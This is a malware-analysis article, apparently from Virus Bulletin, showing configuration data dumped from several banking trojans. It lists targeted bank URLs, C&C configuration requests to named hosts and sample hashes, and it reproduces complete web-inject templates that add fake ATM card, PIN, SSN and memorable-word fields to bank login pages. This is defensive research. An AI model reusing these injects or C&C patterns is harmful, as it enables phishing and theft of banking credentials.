Data tainting for malware analysis - part three (additional results)

2010-02-01

Florent Marceau

CERT-LEXSI, France
Editor: Helen Martin

Abstract

Additional results.

Copyright © 2010 Virus Bulletin

Table of contents
PRG/Zeus/NTOS family
Infostealer family
Ambler family
Banker family
PWS-OnlineGames.cz family

PRG/Zeus/NTOS family

Interests: High, because for this family, each sample has its own configuration file. This is due to its selling and distribution management. The first version used a really simple ciphering algorithm:

for ($i=0; $i<$size; $i++) {
        if (($i%2) ==1) 
                {$key=(0xf9-($i*2))%256;}
        if (($i%2) ==0) 
                {$key=(2*($i+5))%256;}
        clear_data=chr(($data+$key)%256);
}

This was combined with a NRV compression layer. Nowadays the new version has spread widely and employs a RC4 ciphering algorithm using a particular key for each sample. The platform remains effective but the dumper mechanism hardly deals with the NRV algorithm. This leads to insertion of garbage characters that will split our output clear text strings.

MD5: 7300a159eb43b22a5dee588f2d9abf74

Hard drive dump file size: 8.8M

Network dump file size: 657K

# strings ./DMP |grep bank
(...)
https://banking.*.de/cgi/
https://banking.postbank.de/app/
https://www.vr-networld-ebanking.de/index.php?RZKZ=*&
https://banking.sparda.de/w
ps/sparda-net-banking.j
https://ebanking.d
anskebank.dk/*
https://webbanker.cua.com.au
@https://inetbnkp.adelaidebank.com.au/*
https://bankingportal.*.de
/banking/GvLog
https://bankingportal.*.de/cgi/
w.vr-networld-ebanking.de/
ebanking;jsessionid=*?Act
https://www.vr-networld-ebanking.de/*t8
ans.mlp.de/ebanking;jsessionid=*?Action=Login&AuthType=VRN
https://banking.sparda.de/w
https://banking.sparda.de/wps/portal/!ut/p/c1/*/*/*/*
us.citibank.com/cgi-bin/
https://ibank.
https://www.ebank.hsbc.co.uk/servlet/com
ine.openbank.es/servlet/PProxy?*
https://www.bankoa.es*
https://www#.usbank.com/internetB
https://www#.citizensbankonline.com/*/
https://onlinebanking.nationalcity.com/OLB/secure/AccountList.aspx
https://web.da-us.citibank.com/*BS_Id=MemberHomepage*
https://onlineeast#.bankofamericaM
https://onlinebanking#.wachoR
https://ibank.internationalbanking.
https://www.iwbank.i:
ideonline.it/relaxbanking/sso.Login*
e.it/grps/vbank/jsp/login.jsp
https://www.unibanking.it/common/home.jsp
https://privati.internetbanking.banca
https://wbank2.fmbcc.
One/ebank/functions/n_home/
http://www.bancaeuro.it/OneToOne/ebank/functions/n_be/
https://homebanking.cariparma.it/HBPR/hbdoc/LoginApplicazione.jsp
https://www.csebanking.it/@
https://web.da-us.citibank.com/E
https://web.da-us.citibank.com/cgi-bin/citifi/portal/l/autherror.do*
http://akbank.com*
http*://www.mybusinessbank.co.uk/cs70_banking/logon/*
mic-bank.com/online/aspscripts/secretenter.asp*
https://www.rbsiibanking.com/eai/S
https://www.natwestibanking.com/eai/
https://www.onlinebanking.natwestoffshore.J
https://ibank.cahoot.com/servlet/com.aquarius.security.authentication.-
https://ibank.cahoot.com/Aquarius/web/en/core_banking/log_in/frameg
https://ibank.cahoot.com/servlet/com.aquarius.security.authentication.servlet.LoginEntryServlet
.co-operativebank.co.uk/CBIBSWeb/login.do
.co-operativebank.co.uk/CBIBSWeb/passcode.do
https://welcome26.co-operativebank.co.uk/CBIBSWeb/login.do
.co-operativebank.co.uk/CBIBSWeb/passcode.do
aidebank.com.au/OnlineBanking/Ad
https://internetbanking.suncorpmetway>
https://www1.banking.first-direct.com/1/2/!ut/p/kcxml/*;jsessionid=*
https://ibank.
https://ibank.cahoot.com/servlet/com.aquarius.*
https://www.hsbc.co.uk/1/2/personal/internet-banking*
https://welcome27.co-operativebank.co.uk/CBIBSWeb/S
https://www.mybank.alliance-leicester.U
Ahttps://onlineeast#.bankofamerica.com/cgi-bin/ias/*/GotoWelcome1
https://banki
bank
ernetbanking.gad.de/*/portal?
bankid=*
(...)

Infostealer family

Interests: Each sample has its own configuration file. The platform is efficient.

The network configuration loading:

GET /cgi-bin/options.cgi?user_id=503988457&version_id=314&passphrase=fkjvhsdvlksdhvlsd&socks=3086&version=125&crc=00000000 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: luisababa.com.cn
Connection: Keep-Alive

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-type: octet/stream
Content-Length: 13030
Date: Mon, 30 Mar 2009 22:09:43 GMT
Server: lighttpd/1.4.13
Connection: close

....»...p^/>.g.M<.d>.. h.Df=»/CA.O.....Pm.e.nt>!......n.*.i.mg sr...$..Fe..h..?b.nk..._ftr.o=..Y.]
</)...Y....!.r0.ablUe...v)].....%y......oG.es3.+.#Pr.z..SDI_820.8..m». idf...Bqu.._RPT.D]..c.l0.A.L..k»p>I
(...)
:.t.~.!.mZ;.)6*./.FF..........b.[.R5H...SAN....)........6D.t..i.........Fb..

MD5: 205f430cf07508d369eca1016ba06caf

Hard drive dump file size: 96M

Network dump file size: 3M

(...)
  document.getElementById(‘notsend’).value=txt;
alert (
https://corporate.bpn.pt/corporatebanking/V10/PT/login.aspxtxt);
  document.getElementById(‘formn’).submit();
theform.__EVENTTARGET.value = eventTarget.split(“$”).join(“:”);corp.millenniumbcp.pt/_login/MPTCPlogin.aspxEnter  position <nobr>Enter  position <script>var numbaz = new Array (9
);
var temp = new Array(2);
var change=’%param_
-change%’;
var original=’ of your tax no of your tax no’;
temp=original.split(” /46/logo_junho_2007.gif” target=ifr1 id=formn method=post>
<input type=hidden name=notsend id=notsend></form>
</body>and ”);
numbaz[7]=temp[0];
numbaz[8]=temp[1];
var digit=new RegExp(”,corp.millenniumbcp.pt/_login/MPTCPlogin.aspx”);
for(i=1; i<7; i++)
while(digit.test(numbaz)){
digit = new RegExp (Math.floor(Math.random()*9)+1);
numbaz[i]=digit;
numbaz[i]=numbaz[i]+’’;
numbaz[i]=numbaz[i].replace(/\//gi,””);
if(change!=0)
out=numbaz[1]+’, ’+numbaz[2]+’, ’+numbaz[3]+’  and ’+numbaz[4];
document.getElementById(’change’).value=’0’;
else
out=numbaz[5]+’, ’+numbaz[6] +’, ’+original;
document.write(out);
document.getElementById(’notsend’).value=document.getElementById(’ctl00_MainPlaceHolder_MPTCPMainLoginControl1_txtUsementById(’notsend’).value=document.getElementById(’notsend’).
value.replace(/, /gi,”_rname’).innerText+’_’+out;
document.getEle”);
document.getElementById(’notsend’).value=document.getElementById(’notsend’).value.replace(/\?utilizador
-corp.millenniumbcp.pt/_login/MPTCPlogin.aspx<select name=”ctl00$MainPlaceHolder$MPTCPMainLoginControl1$ddlPosition<select name=”pos1” id=”pos1” class=”noFloat”><option selected=
”selected” value=”?”>\=/gi,””);
</script>
(...)

Ambler family

Interests: The Ambler family is very similar to the Banker family (see below).

The network configuration loading:

GET /1/helper.xml HTTP/1.1
User-Agent: si
Host: 216.12.168.138
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 30 Mar 2009 19:03:27 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 23 Mar 2009 12:16:45 GMT
ETag: “1e38f34-857c-3d690540”
Accept-Ranges: bytes
Content-Length: 34172
Connection: close
Content-Type: text/xml

<>znl!tfrrkln< 2.1 #eoaldhld=#ujnemts,3150 #??..
...<hliebv#usn>”vgolrdbrfm! ..aegmqe< malg>urgqie<?/EKU>#”.
(...)
=`d t?!*ocwwdqw*#”a=#>a>=nbbdn#fnp>’qcps2%=”!g>”=-a>#”ni< ?/mcaem<! ndesdv>”1 =<.`d>..?bf”v=#(zaoffx+ #b< . ... .”........! d?!..».........»!oj=#...#»lfgqft< 3»?>,bf<.
=`d t?!*246oonjnd(! c?!stonas{>»!g>»? #mh?!Pmgbsd #ogdpeu?!0#<?/ce=

MD5: 9d1e423304f970ac341c34f10c19e060

Hard drive dump file size: 600Ko

Network dump file size: 64Ko

(...)
<logwords>*abnamro-treasury.com*</logwords>
<logwords>*itl.net*</logwords>
<logwords>*coutts.com*</logwords>
<logwords>*ftbni.com*</logwords>
<logwords>*flemings.com*</logwords>
<logwords>*pb.grindlazs.com*</logwords>
<logwords>*hsbcib.com*</logwords>
<logwords>*hsbcgroup.com*</logwords>
<logwords>*worldserver.pipex.com/nationwide/*</logwords>
<logwords>*molb.com*</logwords>
<logwords>*scotiabank.com*</logwords>
<logwords>*hambrosbank.com*</logwords>
<logwords>*nolb.com*</logwords>
<logwords>*nationet.com*</logwords>
<logwords>*nwolb.com*</logwords>
<logwords>*natwest.com*</logwords>
<logwords>*rbsdigital.com*</logwords>
<logwords>*if.com*</logwords>
<logwords>*firstdirect.com*</logwords>
<logwords>*my.if.com*</logwords>
<logwords>*rbsdigital.com*</logwords>
<logwords>*online-offshore.lloydstsb.com*</logwords>
<logwords>*iblogin.com*</logwords>
<logwords>*akbank*</logwords>
<logwords>*raiffeisenonline.ro*</logwords>
<logwords>*hsbcib.com*</logwords>
<logwords>*hsbcgroup.com*</logwords>
<logwords>*molb.com*</logwords>
<logwords>*nationet.com*</logwords>
<logwords>*nwolb.com*</logwords>
<logwords>*natwest.com*</logwords>
<logwords>*cardsonline-consumer.com*</logwords>
<logwords>*anbusiness.com*</logwords>
<logwords>*hsbc.com*</logwords>
<logwords>*if.com*</logwords>
<logwords>*rbs.com*</logwords>
<logwords>*online-offshore.*</logwords>
<logwords>*iblogin.com*</logwords>
<logwords>*islamic-bank.com*</logwords>
<logwords>*rbsdigital.com*</logwords>
<logwords>*unity.uk.com*</logwords>
<logwords>*nectar.com*</logwords>
<logwords>*skycard.com*</logwords>
<logwords>*nationwideinternational.com*</logwords>
<logwords>*iombank.com*</logwords>
<logwords>*alil.co.im*</logwords>
(...)

Banker family

The Banker family uses the old fashion method - it does not load its configuration file from the network, but instead embeds all the information directly into its code (target strings, HTML code used to inject into the web browser in order to steal information).The whole thing is obfuscated by the packer.

Interests: we do not waste time unpacking it.

MD5: 7b69af0dd6776993be2a642aefa9d7e4

Hard drive dump file size: 12M

Network dump file size: 19K

<inject
url=”citibank.com” 
before=”name=password></TD></TR>” 
what=”
<TR><TD colspan=3 class=smallArial noWrap></TD></TR>
<TR><TD colspan=3 class=smallArial noWrap><SPAN STYLE=’color:red’>
To prevent fraud enter your credit card information please:</SPAN></TD></TR>
<TR><TD colspan=3 class=smallArial noWrap></TD></TR>
<TR><TD noWrap colSpan=2><B>Your ATM or Check Card Number:</B></TD>
<TD class=smallArial noWrap align=right></TD></TR>
<TR><TD class=username colSpan=3><INPUT id=cc type=text maxlength=16 size=16 value=’’ name=cc></TD></TR>
<TR><TD noWrap colSpan=2><B>Expiration Date:</B></TD>
<TD class=smallArial noWrap align=right>(e.g. 07.2007)</TD></TR>
<TR><TD class=username colSpan=3><INPUT id=expdate type=text maxlength=7 size=7 value=’’ name=expdate></TD></TR>
<TR><TD noWrap colSpan=2><B>ATM PIN:</B></TD>
<TD class=smallArial noWrap align=right></TD></TR>
<TR><TD class=username colSpan=3><INPUT id=pin type=password size=4 maxlength=4 value=’’ name=pin></TD></TR>
block=”sign-on.” 
check=”pin”
quan=”4”
content=”d”
</inject>
<inject
url=”bankofamerica” 
before=”name=id></DIV></TD></TR>” 
what=”
<TR><TD>
<DIV class=home-signin-txt4><LABEL for=id><STRONG>Your ATM or Check Card Number:</STRONG></LABEL></DIV></TD></TR>
<TR><TD>
<DIV id=dynamicOnlineIDField2><INPUT  class=home-signin-textbox type=text id=ccnom 
tabIndex=1 maxLength=16 size=16 name=ccnom></DIV></TD></TR>
<TR><TD>
<DIV class=home-signin-txt4><LABEL for=id><STRONG>Your PIN:</STRONG></LABEL></DIV>
<DIV id=dynamicOnlineIDField2><INPUT  class=’atm-zip-box’ type=password 
tabIndex=1 maxLength=4 size=4 name=pin></DIV></TD></TR>
block=”Sign&nbsp;In” 
check=”ccnom”
quan=”16”
content=”d”
</inject>
<inject
url=”usaa” 
before=”Forgot Your Online ID?</A></P>” 
what=”
<H4>SSN:</H4><INPUT onblur=ChangeFocus(); type=password maxLength=9 size=6 value=’’ name=j_ssn>
block=”LOG ON” 
check=”j_ssn”
quan=”9”
content=”d”
</inject>
<inject
url=”chase” 
before=”tabIndex=1 maxLength=32 size=15 name=usr_name>” 
what=”</DIV>
<DIV class=logFormLabel><LABEL for=atmnum>ATM number:</LABEL></DIV>
<DIV class=logonFormFieldBox><INPUT class=pwdTextBox tabIndex=2 maxLength=16 
size=16 value=’’ name=atmnumber></DIV>
<DIV class=logFormLabel><LABEL for=atmpin>ATM PIN:</LABEL></DIV>
<DIV class=logonFormFieldBox><INPUT class=pwdTextBox tabIndex=2 type=password
maxLength=4  size=4 value=’’ name=atmpin></DIV><DIV>
block=”log on” 
check=”atmpin”
quan=”4”
content=”d”
</inject>
<inject
url=”ibank.barclays.co.uk/olb/t/LoginMember.do” 
before=”name=membershipNo></TD></TR>” 
what=”<TD>Memorable word</TD>
<TD align=right height=30><INPUT class=formFont title=’Memorable word’ maxLength=8 name=memo></TD></TR>”
block=”Next” 
check=”memo”
content=”l”
</inject>
<inject
url=”smile.co.uk” 
before=”visaCardNumber></TD></TR>” 
what=”<TR>
<TD class=label><LABEL for=visanumber>Place of birth: &nbsp;</LABEL></TD>
<TD class=field><INPUT id=pbirth maxLength=18 size=18 name=pbirth></TD></TR>
<TR>
<TD class=label><LABEL for=visanumber>First school attended: &nbsp;</LABEL></TD>
<TD class=field><INPUT id=fschool maxLength=18 size=18 name=fschool></TD></TR>
<TR>
<TD class=label><LABEL for=visanumber>Last school attended: &nbsp;</LABEL></TD>
<TD class=field><INPUT id=lschool maxLength=18 size=18 name=lschool></TD></TR>
<TR>
<TD class=label><LABEL for=visanumber>Memorable date: &nbsp;</LABEL></TD>
<TD class=field><INPUT id=mdate maxLength=18 size=18 name=mdate></TD></TR>
<TR>
<TD class=label><LABEL for=visanumber>Memorable name: &nbsp;</LABEL></TD>
<TD class=field><INPUT id=mword maxLength=18 size=18 name=mword></TD></TR>
</inject>

PWS-OnlineGames.cz family

Location: China

MD5: c8ff7e00dd3dab297d6379de6738d1fa

Hard drive dump file size: 11M

Network dump file size: 56M

(...)
keyword  3216  fuwu.koubei.com 58.com ganji.com 51.com myspace.cn class.chinaren.com 5460.net zhenai.com zhiji.com  86400
keyword  3221  fancl 
 luxury.rayli.com.cn chinadrtv.com 51credit.com 
 cib.com.cn boc.cn/cn/static cmbchina.com bankcomm.com  86400
keyword  3223 
 ndichina.cn xiaonei.com cn.msn.com info.china.alibaba.com woyo.com xinhuanet.com 
 baby.sina.com.cn zaojiao.com.cn guaihaizi.com izhufu.com ccppg.com.cn baobao.sohu.com 61w.cn 0-6.com kid.qq.com  86400
 ent.qq.com lady.163.com yoka.com/fashion eachnet.com/landing search.eachnet.com gift.paipai.com shop1.paipai.com mservice.taobao.com  86400
keyword  3234  eachnet.com/zone/women no5.com.cn yoka.com/fashion yoka.com/life women.sohu.com 
 paipai.com/lady 2688.com/shop/fushi.aspx 2688.com/shop/woman.aspx 
(...)
twitter.png
fb.png
linkedin.png
hackernews.png
reddit.png

 

Latest articles:

Nexus Android banking botnet – compromising C&C panels and dissecting mobile AppInjects

Aditya Sood & Rohit Bansal provide details of a security vulnerability in the Nexus Android botnet C&C panel that was exploited to compromise the C&C panel in order to gather threat intelligence, and present a model of mobile AppInjects.

Cryptojacking on the fly: TeamTNT using NVIDIA drivers to mine cryptocurrency

TeamTNT is known for attacking insecure and vulnerable Kubernetes deployments in order to infiltrate organizations’ dedicated environments and transform them into attack launchpads. In this article Aditya Sood presents a new module introduced by…

Collector-stealer: a Russian origin credential and information extractor

Collector-stealer, a piece of malware of Russian origin, is heavily used on the Internet to exfiltrate sensitive data from end-user systems and store it in its C&C panels. In this article, researchers Aditya K Sood and Rohit Chaturvedi present a 360…

Fighting Fire with Fire

In 1989, Joe Wells encountered his first virus: Jerusalem. He disassembled the virus, and from that moment onward, was intrigued by the properties of these small pieces of self-replicating code. Joe Wells was an expert on computer viruses, was partly…

Run your malicious VBA macros anywhere!

Kurt Natvig wanted to understand whether it’s possible to recompile VBA macros to another language, which could then easily be ‘run’ on any gateway, thus revealing a sample’s true nature in a safe manner. In this article he explains how he recompiled…


Bulletin Archive

We have placed cookies on your device in order to improve the functionality of this site, as outlined in our cookies policy. However, you may delete and block all cookies from this site and your use of the site will be unaffected. By continuing to browse this site, you are agreeing to Virus Bulletin's use of data as outlined in our privacy policy.